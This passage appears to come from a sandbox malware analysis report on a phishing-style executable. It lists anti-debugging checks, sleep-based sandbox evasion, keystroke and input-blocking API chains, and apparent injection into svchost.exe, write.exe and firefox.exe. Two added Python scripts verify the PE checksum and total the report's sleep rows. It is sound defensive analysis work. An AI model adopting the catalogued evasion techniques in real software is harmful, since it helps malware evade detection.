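            The checksum row says the value stored in OptionalHeader.CheckSum (0xa961f) is not the value the header algorithm yields for the file (0x15ba7c). Windows only enforces that field for drivers and a few system images, so a mismatch alone is weak evidence, but it is a cheap way to tell that the file was rewritten after linking (packed, patched or appended to) and the linker was not asked to fix the field up. The script below is an added example, not code from the report or from Joe Sandbox: it implements the documented PE checksum (32-bit ones'-complement sum over the image excluding the CheckSum field, folded to 16 bits, plus the file length), reads the stored value, and reports the mismatch. The tiny 32-bit PE skeleton it builds is constructed for the demo.

```python
"""Recompute and verify the PE header CheckSum field.

Added example, not part of the report. build_minimal_pe() constructs a demo image.
"""
from __future__ import annotations

import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Documented PE algorithm: sum 32-bit words with end-around carry, skipping the
    4-byte CheckSum field (assumed 4-byte aligned), fold to 16 bits, add the file length."""
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    total &= 0xFFFF
    return total + len(data)


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew + 4 (PE signature) + 20 (COFF) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    return e_lfanew + 4 + 20 + 64


def verify_checksum(data: bytes) -> tuple[int, int, bool]:
    """Return (stored, computed, matches). A stored value of 0 means the linker never set it."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    computed = pe_checksum(data, off)
    return stored, computed, stored == computed


def with_checksum(data: bytes) -> bytes:
    """Copy of the image with a correct CheckSum field written in."""
    off = checksum_field_offset(data)
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def build_minimal_pe(body: bytes = b"\x90" * 64) -> bytes:
    """Constructed 32-bit PE skeleton: DOS header, PE signature, COFF header, zeroed PE32 optional header."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)      # i386, 1 section, PE32 opt hdr size
    opt = struct.pack("<H", 0x10B) + b"\x00" * 222                        # PE32 magic, CheckSum at +64 is 0
    return dos + b"PE\x00\x00" + coff + opt + body


if __name__ == "__main__":
    image = build_minimal_pe()
    print("unset:", verify_checksum(image))
    print("fixed:", verify_checksum(with_checksum(image)))
```

On the sample itself the same verify_checksum() call would return (0xa961f, 0x15ba7c, False); the stored value being non-zero but wrong, rather than zero, is what distinguishes "modified after linking" from "never set".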
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041385D push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D829 push esp; ret 1_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004138D8 push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004138E3 push edx; retf 1_2_004138EF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414913 push ds; ret 1_2_00414914
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D238 pushad ; iretd 1_2_0040D23A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403300 push eax; ret 1_2_00403302
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D4E3 push edx; retf 1_2_0040D4EB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D77F push esp; ret 1_2_0040D801
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0390225F pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039027FA pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx 1_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0390283D push eax; iretd 1_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03901368 push eax; iretd 1_2_03901369
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BEEA4D push esp; ret 5_2_03BEEA25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF5B37 push ds; ret 5_2_03BF5B38
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF4B07 push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF4A81 push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF4AFC push edx; retf 5_2_03BF4B13
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF7249 pushfd ; ret 5_2_03BF7263
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BEE9A3 push esp; ret 5_2_03BEEA25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BEE707 push edx; retf 5_2_03BEE70F
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF677C push ebx; iretd 5_2_03BF677D
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF6623 push FFFFFF8Fh; iretd 5_2_03BF662F
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF65F8 push ecx; iretd 5_2_03BF6601
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BF6D24 pushad ; ret 5_2_03BF6D25
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Code function: 5_2_03BEE45C pushad ; iretd 5_2_03BEE45E
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_047709AD push ecx; mov dword ptr [esp], ecx 6_2_047709B6
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_008620D1 push ecx; iretd 6_2_008620DA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\write.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | API/Special instruction interceptor: Address: 40B4B14
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\write.exe | Window / User API: threadDelayed 5086
            Source: C:\Windows\SysWOW64\write.exe | Window / User API: threadDelayed 4886
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-85788
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | API coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exe | API coverage: 2.8 %
            Source: C:\Windows\SysWOW64\write.exe TID: 2232 | Thread sleep count: 5086 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 2232 | Thread sleep time: -10172000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe TID: 2232 | Thread sleep count: 4886 > 30
            Source: C:\Windows\SysWOW64\write.exe TID: 2232 | Thread sleep time: -9772000s >= -30000s
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236 | Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236 | Thread sleep time: -51000s >= -30000s
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236 | Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236 | Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\write.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exe | Last function: Thread delayed
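            The sleep rows above are printed one burst at a time, which hides the shape of the loop. Aggregating them per thread shows that write.exe's thread 2232 issued 9972 delays totalling 19944000 units, i.e. a fixed 2000-unit delay in a tight loop, which is why its API coverage is only 2.8 % and why the sandbox had to fast-forward the sleeps. The script below is an added example, not code from the report or from Joe Sandbox: it parses the rows as the report prints them (the negative value is the relative interval as NtDelayExecution takes it) and applies the report's own thresholds of 30 calls and 30000 units. The rows embedded in it are copied from this page; reading the values as milliseconds is an assumption about the report's unit suffix (its 30000 threshold corresponds to the 30-second rule it applies).

```python
"""Aggregate Joe Sandbox 'Thread sleep' rows per thread.

Added example, not part of the report. REPORT_ROWS are the rows of this page, verbatim.
"""
from __future__ import annotations

import re
from collections import defaultdict

REPORT_ROWS = r"""
Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep count: 5086 > 30Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep time: -10172000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep count: 4886 > 30Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 2232Thread sleep time: -9772000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -65000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep count: 34 > 30Jump to behavior
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -51000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep count: 36 > 30Jump to behavior
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe TID: 3236Thread sleep time: -36000s >= -30000sJump to behavior
"""

# Tolerates the glued columns and the trailing link text exactly as extracted.
ROW_RE = re.compile(
    r"Source: (?P<image>.+?) TID: (?P<tid>\d+)\s*Thread sleep (?P<kind>count|time): (?P<val>-?\d+)"
)
THRESHOLD_CALLS = 30      # the report's "> 30" rule
THRESHOLD_MS = 30_000     # the report's ">= -30000s" rule, read as milliseconds (assumption)


def summarise_sleeps(text: str) -> dict[tuple[str, int], dict]:
    """Per (image, tid): total calls, total delay, average delay per call, and the report's verdict."""
    acc: dict[tuple[str, int], dict] = defaultdict(lambda: {"calls": 0, "total_ms": 0})
    for m in ROW_RE.finditer(text):
        key = (m["image"], int(m["tid"]))
        val = abs(int(m["val"]))          # negative = relative interval, take the magnitude
        if m["kind"] == "count":
            acc[key]["calls"] += val
        else:
            acc[key]["total_ms"] += val
    out = {}
    for key, v in acc.items():
        per_call = v["total_ms"] / v["calls"] if v["calls"] else None
        out[key] = {
            **v,
            "per_call_ms": per_call,
            "evasive": v["calls"] > THRESHOLD_CALLS or v["total_ms"] > THRESHOLD_MS,
        }
    return out


if __name__ == "__main__":
    for (image, tid), s in summarise_sleeps(REPORT_ROWS).items():
        print(f"{image} tid={tid}: {s['calls']} calls, {s['total_ms']} ms total, "
              f"{s['per_call_ms']} ms/call, evasive={s['evasive']}")
```

A uniform per-call value (2000 here) points at a hard-coded Sleep in a polling loop rather than randomised jitter; the dropper's thread 3236 averages roughly 2171 per call across its bursts, so its delays are not uniform, and the count/time rows for it cannot be paired one-to-one from the order they are printed in.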
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_0086C340 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C340
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: TNPukQnytLH.exe, 00000007.00000002.4161395740.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000008.00000002.2463776603.000002551C6AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | API call chain: ExitProcess graph end node graph_0-84914
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\write.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417593 LdrLoadDll,1_2_00417593
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_040B3760 mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_040B4D80 mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_040B4DE0 mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] (3x); mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h] (6x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h] (4x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039663FF mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h] (8x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h] (3x); mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B035C mov eax, dword ptr fs:[00000030h] (5x); mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h] (15x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D437C mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A0634F mov eax, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h] (5x); mov ecx, dword ptr fs:[00000030h] (1x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h] (5x)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h] 1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A062D6 mov eax, dword ptr fs:[00000030h]1_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0625D mov eax, dword ptr fs:[00000030h]1_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
